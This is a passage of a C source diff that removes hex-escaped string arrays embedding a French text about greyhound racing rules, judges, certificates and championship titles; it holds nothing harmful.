-"\x65\x20\x6c\x69\x67\x6e\x65\x20\x64\x72\x6f\x69\x74\x65\x20\x28"
-"\x34\x30\x2d\x35\x30\x6d\x29\x20\x61\x76\x65\x63\x20\x62\x69\x65"
-"\x6e\x20\x64\x65\x73\x20\x61\x6c\xe9\x61\x73\x20\x61\x75\x20\x74"
-"\x6f\x75\x72\x6e\x61\x6e\x74\x2e\x20\x4d\x61\x69\x73\x20\x63\x65"
-"\x6c\x61\x20\x70\x6f\x75\x72\x72\x61\x69\x74\x20\x63\x68\x61\x6e"
-"\x67\x65\x72\x20\x64\x61\x6e\x73\x20\x6c\x65\x73\x20\x61\x6e\x6e"
-"\xe9\x65\x73\x20\xe0\x20\x76\x65\x6e\x69\x72\x2e\x0d\x0d\x09\x54"
-"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x3a\x0d\x49"
-"\x6c\x20\x65\x73\x74\x20\x63\x61\x6c\x63\x75\x6c\xe9\x20\x61\x6e"
-"\x6e\x75\x65\x6c\x6c\x65\x6d\x65\x6e\x74\x20\x70\x6f\x75\x72\x20"
-"\x63\x68\x61\x71\x75\x65\x20\x70\x69\x73\x74\x65\x2c\x20\x72\x61"
-"\x63\x65\x2c\x20\x63\x61\x74\xe9\x67\x6f\x72\x69\x65\x2c\x20\x64"
-"\x65\x20\x66\x61\xe7\x6f\x6e\x20\xe0\x20\x75\x6e\x69\x66\x6f\x72"
-"\x6d\x69\x73\x65\x72\x20\x6c\x65\x73\x20\x72\xe9\x73\x75\x6c\x74"
-"\x61\x74\x73\x2e\x20\x43\x68\x61\x71\x75\x65\x20\x63\x61\x74\xe9"
-"\x67\x6f\x72\x69\x65\x20\x64\x65\x20\x76\x69\x74\x65\x73\x73\x65"
-"\x20\x63\x6f\x72\x72\x65\x73\x70\x6f\x6e\x64\x20\xe0\x20\x31\x2c"
-"\x20\x32\x2c\x20\x33\x2c\x20\x34\x20\x73\x65\x63\x6f\x6e\x64\x65"
-"\x73\x20\x70\x61\x72\x20\x72\x61\x70\x70\x6f\x72\x74\x20\x61\x75"
-"\x20\x74\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x2e\x20"
-"\x54\x6f\x75\x73\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72"
-"\x73\x20\x41\x20\x64\x6f\x69\x76\x65\x6e\x74\x20\x70\x6f\x75\x76"
-"\x6f\x69\x72\x20\x66\x69\x67\x75\x72\x18\x72\x20\x68\x6f\x6e\x6f"
-"\x72\x61\x62\x6c\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x6e\x69\x76"
-"\x65\x61\x75\x20\x69\x6e\x74\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61"
-"\x6c\x20\x73\x61\x6e\x73\x20\x70\x72\xe9\x74\x65\x6e\x64\x72\x65"
-"\x20\x66\x6f\x72\x63\x65\x6d\x65\x6e\x74\x20\x61\x75\x20\x70\x6f"
-"\x64\x69\x75\x6d\x2e\x0d\x0d\x09\x43\x68\x65\x66\x20\x64\x65\x20"
-"\x70\x69\x73\x74\x65\x20\x3a\x0d\x43\x27\x65\x73\x74\x20\x6c\x65"
-"\x20\x72\x65\x73\x70\x6f\x6e\x73\x61\x62\x6c\x65\x20\x74\x65\x63"
-"\x68\x6e\x69\x71\x75\x65\x20\x64\x65\x20\x6c\x61\x20\x6a\x6f\x75"
-"\x72\x6e\xe9\x65\x20\x65\x74\x20\x6c\x61\x20\x73\x65\x75\x6c\x65"
-"\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x20\x68\x61\x62\x69\x6c\x69"
-"\x74\xe9\x65\x20\xe0\x20\x72\x65\x63\x65\x76\x6f\x69\x72\x20\x76"
-"\x6f\x73\x20\x64\x6f\x6c\xe9\x61\x6e\x63\x65\x73\x20\x6f\x75\x20"
-"\x72\xe9\x63\x6c\x61\x6d\x61\x74\x69\x6f\x6e\x73\x2e\x20\x49\x6c"
-"\x20\x6c\x65\x73\x20\xe9\x63\x61\x72\x74\x65\x20\x6f\x75\x20\x6c"
-"\x65\x73\x20\x74\x72\x61\x6e\x73\x6d\x65\x74\x20\x61\x75\x20\x6a"
-"\x75\x67\x65\x20\x71\x75\x35\x20\x61\x20\x73\x65\x75\x6c\x20\x70"
-"\x6f\x75\x76\x6f\x69\x72\x20\x64\x65\x20\x64\xe9\x63\x69\x73\x69"
-"\x6f\x6e\x2e\x0d\x0d\x09\x4a\x75\x67\x65\x20\x3a\x0d\x4c\x65\x20"
-"\x6a\x75\x67\x65\x20\x65\x73\x74\x20\x75\x6e\x20\x65\x78\x70\x65"
-"\x72\x74\x20\x71\x75\x69\x20\x61\x20\x70\x61\x73\x73\xe9\x20\x75"
-"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x64\x65\x76\x61\x6e\x74\x20"
-"\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9"
-"\x76\x72\x69\x65\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x75\x6e\x20"
-"\x61\x75\x74\x72\x65\x20\x65\x6e\x20\x45\x63\x6f\x6c\x65\x20\x56"
-"\xe9\x74\xe9\x72\x69\x6e\x61\x69\x72\x65\x20\x61\x70\x72\xe8\x73"
-"\x20\x75\x6e\x20\x73\x74\x61\x67\x65\x20\x64\x65\x20\x33\x20\x6a"
-"\x6f\x75\x72\x73\x2c\x20\x70\x75\x69\x73\x20\x61\x20\x65\x78\x65"
-"\x72\x63\xe9\x20\x61\x75\x70\x72\xe8\x73\x20\x64\x27\x75\x6e\x20"
-"\x6a\x75\x67\x65\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x20\x28\x61"
-"\x73\x73\x65\x73\x73\x6f\x72\x61\x74\x29\x2c\x20\x70\x75\x69\x73"
-"\x20\x69\x6c\x20\x65\x73\x74\x20\x70\x72\x6f\x70\x6f\x73\xe9\x20"
-"\x70\x61\x72\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f"
-"\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\xe0\x20\x6c\x61\x20"
-"\x43\x6f\x6d\x6d\x69\x73\x73\x69\x6f\x6e\x20\x64\x65\x73\x20\x4a"
-"\x75\x67\x65\x73\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x2e\x20"
-"\x49\x6c\x20\x70\x6f\x75\x72\x72\x61\x20\x61\x6c\x6f\x72\x73\x20"
-"\x6a\x75\x67\x65\x72\x20\x6c\x65\x73\x20\xe9\x70\x72\x65\x75\x76"
-"\x65\x73\x20\x6f\x72\x64\x69\x6e\x61\x69\x72\x65\x73\x20\x61\x76"
-"\x61\x6e\x74\x20\x64\x27\xea\x74\x72\x65\x20\x71\x75\x61\x6c\x69"
-"\x66\x69\xe9\x2e\x20\x55\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73"
-"\x20\x6c\x6f\x6e\x67\x2c\x20\x63\x6f\x6d\x70\x6c\x65\x78\x65\x2c"
-"\x20\x70\xe9\x6e\x69\x62\x6c\x65\x20\x71\x75\x69\x20\x6d\xe9\x72"
-"\x69\x74\x65\x20\x76\x6f\x74\x72\x65\x20\x63\x6f\x75\x72\x74\x6f"
-"\x69\x73\x69\x65\x2e\x0d\x0d\x09\x45\x78\x70\x65\x72\x74\x20\x51"
-"\x75\x61\x6c\x69\x66\x69\x63\x61\x74\x65\x75\x72\x20\x3a\x0d\x34"
-"\x20\x61\x75\x20\x6d\x61\x78\x69\x6d\x75\x6d\x20\x70\x61\x72\x20"
-"\x43\x6c\x75\x62\x2c\x20\x70\x6c\x75\x73\x20\x6c\x65\x73\x20\x6a"
-"\x75\x67\x65\x73\x20\x71\x75\x61\x6c\x69\x66\x69\xe9\x73\x2c\x20"
-"\x70\x72\x6f\x70\x6f\x73\xe9\x73\x20\x70\x61\x72\x20\x6c\x65\x20"
-"\x43\x6c\x75\x62\x2e\x20\x49\x6c\x20\x73\x75\x62\x69\x74\x20\x75"
-"\x6e\x20\x65\x78\x61\x6d\x65\x6e\x20\x74\x68\xe9\x6f\x72\x69\x71"
-"\x75\x65\x20\x65\x74\x20\x70\x72\x61\x74\x69\x71\x75\x65\x20\x64"
-"\x65\x76\x61\x6e\x74\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73"
-"\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x71\x75\x69"
-"\x20\x6c\x65\x20\x6e\x6f\x6d\x6d\x65\x2e\x20\x4c\x65\x20\x50\x72"
-"\xe9\x73\x69\x64\x65\x6e\x74\x20\x64\x75\x20\x43\x6c\x75\x62\x20"
-"\x6f\x75\x20\x6c\x61\x20\x43\x6f\x6d\x6d\x69\x73\x73\x69\xc9\x6e"
-"\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x70\x65\x75\x76\x65\x6e"
-"\x74\x20\x6c\x65\x20\x72\x65\x6c\x65\x76\x65\x72\x20\x64\x65\x20"
-"\x73\x61\x20\x66\x6f\x6e\x63\x74\x69\x6f\x6e\x2c\x20\x71\x75\x69"
-"\x20\x65\x73\x74\x20\x64\xe9\x6c\x69\x63\x61\x74\x65\x20\x65\x74"
-"\x20\x6c\x6f\x75\x72\x64\x65\x2e\x0d\x0d\x09\x43\x6f\x6d\x6d\x69"
-"\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20\x3a"
-"\x0d\x0d\x45\x6c\x6c\x65\x20\x63\x6f\x6d\x70\x72\x65\x6e\x64\x20"
-"\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65\x20\x64\x65\x20\x70"
-"\x65\x72\x73\x6f\x6e\x6e\x65\x73\x20\x6e\x6f\x6d\x6d\xe9\x65\x73"
-"\x20\x70\x6f\x75\x72\x20\x74\x72\x6f\x69\x73\x20\x61\x6e\x73\x20"
-"\x70\x61\x72\x20\x6c\x65\x20\x43\x6f\x6d\x69\x74\xe9\x20\x64\x65"
-"\x20\x6c\x61\x20\x53\x43\x43\x20\x70\x61\x72\x6d\x69\x20\x73\x65"
-"\x73\x20\x70\x72\x6f\x70\x72\x65\x73\x20\x6d\x65\x6d\x62\x72\x65"
-"\x73\x20\x65\x74\x20\x70\x61\x72\x6d\x69\x20\x64\x65\x73\x20\x70"
-"\x65\x72\x73\x6f\x6e\x6e\x61\x6c\x69\x74\xe9\x73\x20\x71\x75\x61"
-"\x6c\x69\x66\x69\xe9\x65\x73\x2e\x20\x4c\x61\x20\x43\x6f\x6d\x6d"
-"\x69\x73\x73\x69\x6f\x6e\x20\x4c\xe9\x76\x72\x69\x65\x72\x73\x20"
-"\xe9\x6c\x69\x74\x20\xe0\x20\x73\x6f\x6e\x20\x74\x6f\x75\x72\x20"
-"\x65\x6e\x20\x73\x6f\x6e\x20\x73\x65\x69\x6e\x20\x64\x69\x76\x65"
-"\x72\x73\x65\x73\x20\x70\x65\x72\x73\x6f\x6e\x6e\x65\x73\x2e\x20"
-"\x50\x6f\x75\x72\x20\x6c\x61\x20\x70\xe9\x72\x69\x6f\x64\x65\x20"
-"\x32\x30\x30\x33\x20\x2d\x20\x32\x30\x30\x36\x2c\x20\x20\x6e\x6f"
-"\x75\x73\x20\x61\x76\x6f\x6e\x73\x20\x61\x69\x6e\x73\x69\x20\x3a"
-"\x0d\x0d\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74\x20\x3a\x0d\x2d"
-"\x20\x4d\x2e\x20\x48\x65\x72\x6d\x65\x6c\x2c\x20\x43\x6f\x6d\x69"
-"\x74\xe9\x20\x53\x43\x43\x2c\x20\x4a\x75\x67\x65\x2e\x0d\x0d\x20"
-"\x53\x65\x63\x72\xe9\x74\x61\x69\x72\x65\x20\x3a\x0d\x2d\x20\x4d"
-"\x6c\x6c\x65\x20\x4d\x6f\x6e\x69\x6f\x74\x2c\x20\x4a\x75\x67\x65"
-"\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x50\x72\xe9"
-"\x73\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x43\x4c\x43\x2c\x20"
-"\x43\x6f\x6d\x69\x74\xe9\x20\x43\x46\x57\x2c\x20\x43\x6f\x6d\x69"
-"\x74\xe9\x20\x43\x46\x50\x4c\x49\x2e\x0d\x53\x65\x63\x72\xe9\x74"
-"\x64\x69\x72\x65\x20\x61\x64\x6a\x6f\x69\x6e\x74\x3a\x0d\x2d\x20"
-"\x4d\x2e\x20\x46\x61\x75\x72\x65\x2c\x20\x4a\x75\x67\x65\x0d\x0d"
-"\x20\x4d\x65\x6d\x62\x72\x65\x73\x20\x3a\x0d\x2d\x20\x4d\x2e\x41"
-"\x72\x74\x68\x75\x73\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74"
-"\x20\x64\x65\x20\x6c\x61\x20\x53\x43\x43\x0d\x2d\x20\x4d\x6d\x65"
-"\x20\x54\x75\x6d\x61\x2c\x20\x50\x72\xe9\x73\x69\x64\x65\x6e\x74"
-"\x65\x20\x64\x75\x20\x43\x46\x50\x4c\x49\x2c\x20\x50\x72\xe9\x73"
-"\x69\x64\x65\x6e\x74\x65\x20\x64\x75\x20\x4e\x41\x4c\x4c\x85\x0d"
-"\x2d\x20\x4d\x2e\x20\x41\x69\x6e\x61\x72\x64\x69\x2c\x20\x4a\x75"
-"\x67\x65\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x2c\x20\x4a"
-"\x75\x67\x65\x2c\x20\x20\x0d\x09\x43\x6f\x75\x72\x73\x65\x20\x49"
-"\x2e\x54\x2e\x20\x3a\x0d\x43\x6f\x75\x72\x73\x65\x20\x69\x6e\x74"
-"\x65\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x0d\x09\x4c"
-"\x69\x63\x65\x6e\x63\x65\x20\x3a\x0d\x41\x6e\x63\x69\x65\x6e\x6e"
-"\x65\x20\x61\x70\x70\x65\x6c\x6c\x61\x74\x69\x6f\x6e\x20\x64\x65"
-"\x20\x6c\x61\x20\x6c\x69\x63\x65\x6e\x63\x65\x20\x69\x6e\x74\x65"
-"\x72\x6e\x61\x74\x69\x6f\x6e\x61\x6c\x65\x2e\x0d\x43\x6f\x72\x72"
-"\x65\x73\x70\x6f\x6e\x64\x20\x61\x75\x20\x6e\x6f\x8c\x76\x65\x61"
-"\x75\x20\x63\x61\x72\x6e\x65\x74\x20\x31\x39\x39\x30\x2e\x0d\x0d"
-"\x09\x42\x41\x43\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e\x74\x20"
-"\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63\x61\x70"
-"\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69\x72\x20"
-"\x65\x6e\x20\x72\x61\x63\x69\x6e\x67\x20\x65\x74\x20\x50\x56\x4c"
-"\x2e\x20\x41\x75\x74\x72\x65\x66\x6f\x69\x73\x20\x43\x41\x54\x2e"
-"\x0d\x0d\x09\x42\x50\x56\x20\x3a\x0d\x44\x6f\x63\x75\x6d\x65\x6e"
-"\x74\x20\x61\x74\x74\x65\x73\x74\x61\x6e\x74\x20\x6c\x61\x20\x63"
-"\x61\x70\x61\x63\x69\x74\xe9\x20\x64\x65\x20\x63\x6f\x75\x72\x69"
-"\x72\x20\x65\x6e\x20\x50\x56\x4c\x2e\x20\x41\x75\x74\x72\x65\x66"
-"\x6f\x69\x73\x20\x43\x41\x54\x50\x2e\x0d\x0d\x09\x43\x41\x43\x54"
-"\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27"
-"\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d"
-"\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61"
-"\x69\x6c\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x76"
-"\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x65\x20\x6c\x61\x20\x63"
-"\x61\x74\xe9\x67\x6f\x72\x69\x65\x20\x41\x2e\x0d\x0d\x09\x52\x43"
-"\x41\x43\x54\x20\x3a\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65"
-"\x20\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70"
-"\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69"
-"\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x54\x72\x61\x76\x61\x69\x6c"
-"\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63"
-"\x6f\x6e\x64\x20\x64\x65\x20\x6c\x61\x20\x63\x61\x74\xe9\x67\x6f"
-"\x72\x69\x65\x20\x41\x2e\x20\x49\x6c\x20\x73\x65\x20\x74\x72\x61"
-"\x6e\x73\x66\x6f\x72\x6d\x65\x20\x65\x6e\x20\x43\x41\x43\x54\x20"
-"\x73\x69\x20\x6c\x65\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20"
-"\x65\x73\x74\x20\x75\x6e\x20\x63\x68\x61\x6d\x70\x69\x6f\x6e\x20"
-"\x68\x6f\x6d\x6f\x6c\x6f\x67\x75\xe9\x2e\x0d\x0d\x09\x43\x41\x43"
-"\x50\x20\x3a\x0d\x43\x65\x72\x74\x69\x66\x69\x63\x61\x74\x20\x64"
-"\x27\x41\x70\x74\x69\x74\x75\x64\x65\x20\x61\x75\x20\x43\x68\x61"
-"\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x20\x64\x65\x20\x50\x6f\x75\x72"
-"\x73\x75\x69\x74\x65\x2e\x0d\x44\xe9\x63\x65\x72\x6e\xe9\x20\x61"
-"\x75\x20\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x20\x64\x27\x75\x6e"
-"\x65\x20\x45\x50\x56\x4c\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e"
-"\x20\x6d\x69\x6e\x69\x6d\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70"
-"\x6f\x69\x6e\x74\x73\x2e\x0d\x0d\x09\x52\x43\x41\x43\x50\x20\x3a"
-"\x0d\x52\xe9\x73\x65\x72\x76\x65\x20\x64\x65\x20\x43\x65\x72\x74"
-"\x69\x66\x69\x63\x61\x74\x20\x64\x27\x41\x70\x74\x69\x74\x75\x64"
-"\x65\x20\x61\x75\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74"
-"\x20\x64\x65\x20\x50\x6f\x75\x72\x73\x75\x69\x74\x65\x2e\x0d\x44"
-"\xe9\x63\x65\x72\x6e\xe9\x20\x61\x75\x20\x73\x65\x63\x6f\x6e\x64"
-"\x2c\x20\x61\x79\x61\x6e\x74\x20\x75\x6e\x20\x6d\x69\x6e\x69\x6d"
-"\x75\x6d\x20\x64\x65\x20\x32\x35\x20\x70\x6f\x69\x6e\x74\x73\x2e"
-"\x0d\x0d\x09\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x20\x3a\x0d\x4c"
-"\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9\x20\x41\x20"
-"\x61\x75\x20\x63\x68\x72\x6f\x6e\x6f\x6d\xe8\x74\x72\x65\x20\x6f"
-"\x75\x20\x61\x79\x61\x6e\x74\x20\x64\x65\x20\x33\x33\x20\xe0\x20"
-"\x32\x33\x20\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c"
-"\x61\x20\x50\x56\x4c\x2e\x0d\x0d\x09\x54\x72\xe8\x73\x20\x42\x6f"
-"\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73"
-"\x73\xe9\x20\x65\x6e\x20\x42\x20\x6f\x75\x20\x61\x79\x61\x6e\x74"
-"\x20\x64\x65\x20\x32\x32\x20\xe0\x20\x31\x38\x20\x70\x6f\x69\x6e"
-"\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50\x56\x4c\x2e\x0d"
-"\x0d\x09\x42\x6f\x6e\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20"
-"\x63\x6c\x61\x73\x73\xe9\x20\x65\x6e\x20\x43\x20\x6f\x75\x20\x61"
-"\x79\x61\x6e\x74\x20\x64\x65\x20\x31\x37\x20\xe0\x20\x31\x30\x20"
-"\x70\x6f\x69\x6e\x74\x73\x20\x70\x6f\x75\x72\x20\x6c\x61\x20\x50"
-"\x56\x4c\x2e\x0d\x0d\x09\x41\x73\x73\x65\x7a\x20\x42\x6f\x6e\x20"
-"\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x63\x6c\x61\x73\x73\xe9"
-"\x20\x65\x6e\x20\x44\x2e\x0d\x0d\x09\x49\x6e\x74\x65\x72\x6e\x61"
-"\x74\x69\x6f\x6e\x61\x6c\x20\x3a\x0d\x4c\xe9\x76\x72\x69\x65\x72"
-"\x20\x61\x79\x61\x6e\x74\x20\x65\x66\x66\x65\x63\x74\x75\xe9\x20"
-"\x75\x6e\x20\x70\x61\x72\x63\x6f\x75\x72\x73\x20\x70\x6c\x75\x73"
-"\x20\x72\x61\x70\x69\x64\x65\x20\x71\x75\x65\x20\x6c\x65\x20\x74"
-"\x65\x6d\x70\x73\x20\x64\x65\x20\x62\x61\x73\x65\x20\x65\x74\x20"
-"\x6d\x65\x73\x75\x72\xe9\x20\x70\x61\x72\x20\x75\x6e\x20\x70\x72"
-"\x6f\x63\xe9\x64\xe9\x20\xe9\x6c\x65\x63\x74\x72\x69\x71\x75\x65"
-"\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64\x65\x20"
-"\x54\x72\x61\x76\x61\x69\x6c\x20\x45\x4e\x43\x20\x3a\x0d\x53\x75"
-"\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c\x20\x69"
-"\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xad\x63\x72\x69\x74\x20\x3a"
-"\x20\x43\x48\x54\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20\x61\x79"
-"\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x73\x75\x72\x20"
-"\x33\x20\x70\x69\x73\x74\x65\x73\x20\x64\x69\x66\x66\xe9\x72\x65"
-"\x6e\x74\x65\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43\x41"
-"\x43\x54\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65\x20"
-"\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c\x0d"
-"\x09\x2d\x20\x55\x6e\x20\x43\x41\x43\x54\x20\x65\x6e\x20\x53\x70"
-"\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09\x2d\x20\x55\x6e\x20\x61"
-"\x75\x74\x72\x65\x20\x43\x41\x43\x54\x2c\x0d\x20\x09\x2d\x20\x55"
-"\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74\x0d\x09\x2d\x20\x55"
-"\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20\x65\x6e\x20\x65\x78"
-"\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e\x20\x46\x72\x61\x6e"
-"\x63\x65\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69\x6f\x6e\x20\x64"
-"\x65\x20\x54\x72\x61\x76\x61\x69\x6c\x20\x50\x56\x4c\x20\x3a\x0d"
-"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c"
-"\x20\x69\x6c\x20\x79\x20\x61\x75\x72\x61\x20\xe9\x63\x72\x69\x74"
-"\x20\x3a\x20\x54\x50\x4f\x2e\x0d\x4c\xe9\x76\x72\x69\x65\x72\x20"
-"\x61\x79\x61\x6e\x74\x20\x72\xe9\x61\x6c\x69\x73\xe9\x20\x61\x76"
-"\x65\x63\x20\x33\x20\x6a\x75\x67\x65\x73\x20\x64\x69\x66\x66\xe9"
-"\x72\x65\x6e\x74\x73\x20\x3a\x0d\x20\x09\x2d\x20\x4c\x65\x20\x43"
-"\x41\x43\x50\x20\x64\x65\x20\x6c\x27\xe9\x70\x72\x65\x75\x76\x65"
-"\x20\x64\x65\x20\x43\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x2c"
-"\x0d\x09\x2d\x20\x55\x6e\x20\x45\x78\x63\x65\x6c\x6c\x65\x6e\x74"
-"\x20\x65\x6e\x20\x53\x70\xe9\x63\x69\x61\x6c\x65\x2c\x0d\x20\x09"
-"\x2d\x20\x55\x6e\x20\x61\x75\x74\x72\x65\x20\x43\x41\x43\x50\x2c"
-"\x0d\x09\x2d\x20\x55\x6e\x20\x54\x72\xe8\x73\x20\x42\x6f\x6e\x20"
-"\x65\x6e\x20\x65\x78\x70\x6f\x73\x69\x74\x69\x6f\x6e\x20\x65\x6e"
-"\x20\x46\x72\x61\x6e\x63\x65\x2e\x0d\x0d\x4c\x61\x20\x64\x65\x6d"
-"\x61\x6e\x64\x65\x20\x64\x92\x68\x6f\x6d\x6f\x6c\x6f\x67\x61\x74"
-"\x69\x6f\x6e\x20\x64\x65\x76\x72\x61\x20\xea\x74\x72\x65\x20\x72"
-"\xe9\x61\x6c\x69\x73\xe9\x65\x20\x6f\x62\x6c\x69\x67\x61\x74\x6f"
-"\x69\x72\x65\x6d\x65\x6e\x74\x20\x64\x61\x6e\x73\x20\x6c\x65\x73"
-"\x20\x36\x20\x6d\x6f\x69\x73\x20\x71\x75\x69\x20\x73\x75\x69\x76"
-"\x65\x6e\x74\x20\x6c\x92\x6f\x62\x74\x65\x6e\x74\x69\x6f\x6e\x20"
-"\x64\x65\x20\x63\x65\x73\x20\x65\x78\x69\x67\x65\x6e\x63\x65\x73"
-"\x20\x61\x75\x73\x73\x69\x20\x62\x69\x65\x6e\x20\x70\x6f\x75\x72"
-"\x20\x6c\x61\x20\x50\x56\x4c\x20\x71\x75\x65\x20\x70\x6f\x75\x72"
-"\x20\x6c\x92\x45\x4e\x43\x2e\x0d\x0d\x09\x43\x68\x61\x6d\x70\x69"
-"\x6f\x6e\x20\x64\x65\x20\x56\x69\x74\x65\x73\x73\x65\x20\x3a\x0d"
-"\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64\x69\x67\x72\x65\x65\x2c"
-"\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63\x72\x69\x74\x20\x43\x48"
-"\x56\x69\x2e\x0d\x43\x65\x20\x73\x6f\x6e\x74\x20\x6c\x65\x73\x20"
-"\x76\x61\x69\x6e\x71\x75\x65\x75\x72\x73\x20\x64\x65\x73\x20\x43"
-"\x68\x61\x6d\x70\x69\x6f\x6e\x6e\x61\x74\x73\x20\x64\x65\x20\x74"
-"\x79\x70\x65\x20\x55\x49\x43\x4c\x20\x6f\x72\x67\x61\x6e\x69\x73"
-"\xe9\x73\x20\x65\x6e\x20\x46\x72\x61\x6e\x63\x65\x20\x70\x65\x6e"
-"\x64\x61\x6e\x74\x20\x75\x6e\x65\x20\x64\x69\x7a\x61\x69\x6e\x65"
-"\x20\x64\x92\x61\x6e\x6e\xe9\x65\x2e\x0d\x0d\x09\x4c\x61\x75\x72"
-"\xe9\x61\x74\x20\x53\x74\x61\x6e\x64\x61\x72\x64\x20\x50\x65\x72"
-"\x66\x6f\x72\x6d\x61\x6e\x63\x65\x73\x20\x4c\xe9\x76\x72\x69\x65"
-"\x72\x73\x20\x3a\x0d\x20\x53\x75\x72\x20\x6c\x65\x20\x70\x65\x64"
-"\x69\x67\x72\x65\x65\x2c\x20\x69\x6c\x20\x79\x20\x61\x20\xe9\x63"
-"\x72\x69\x74\x20\x3a\x20\x43\x48\x20\x4c\x53\x50\x0d\x4c\x65\x20"
-"\x6c\xe9\x76\x72\x69\x65\x72\x20\x70\x6f\x75\x72\x72\x61\x20\x70"
-"\x72\xe9\x74\x65\x6e\x64\x72\x65\x20\xe0\x20\x75\x6e\x20\x73\x65"
-"\x75\x6c\x20\x74\x69\x74\x72\x65\x20\x64\x65\x20\x4c\x53\x50\x20"
-"\x71\x75\x69\x20\x73\x65\x72\x61\x20\x6f\x62\x74\x65\x6e\x75\x20"
-"\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x65\x20\x72\x61\x63\x69"
-;
-char file_part2[]=
-"\x6e\x67\x2c\x20\x73\x6f\x69\x74\x20\x70\x61\x72\x20\x6c\x61\x20"
-"\x50\x56\x4c\x2c\x20\x73\x6f\x69\x74\x20\x6d\x69\x78\x74\x65\x2e"
-"\x0d\x0d\x43\x6f\x75\x72\x73\x65\x3a\x0d\x43\x65\x20\x73\x6f\x6e"
-"\x74\x20\x6c\x65\x73\x20\x6c\xe9\x76\x72\x69\x65\x72\x73\x20\x61"
-"\x79\x61\x6e\x74\x20\x6f\x62\x74\x65\x6e\x75\x20\xe0\x20\x6c\x61"
-"\x20\x66\x6f\x69\x73\x20\x64\x65\x20\x67\x72\x61\x6e\x64\x73\x20"
-"\x72\xe9\x73\x75\x6c\x74\x61\x74\x73\x20\x65\x6e\x20\x45\x78\x70"
-"\x6f\x73\x69\x74\x69\x6f\x6e\x20\x28\x61\x75\x20\x6d\x6f\x69\x6e"
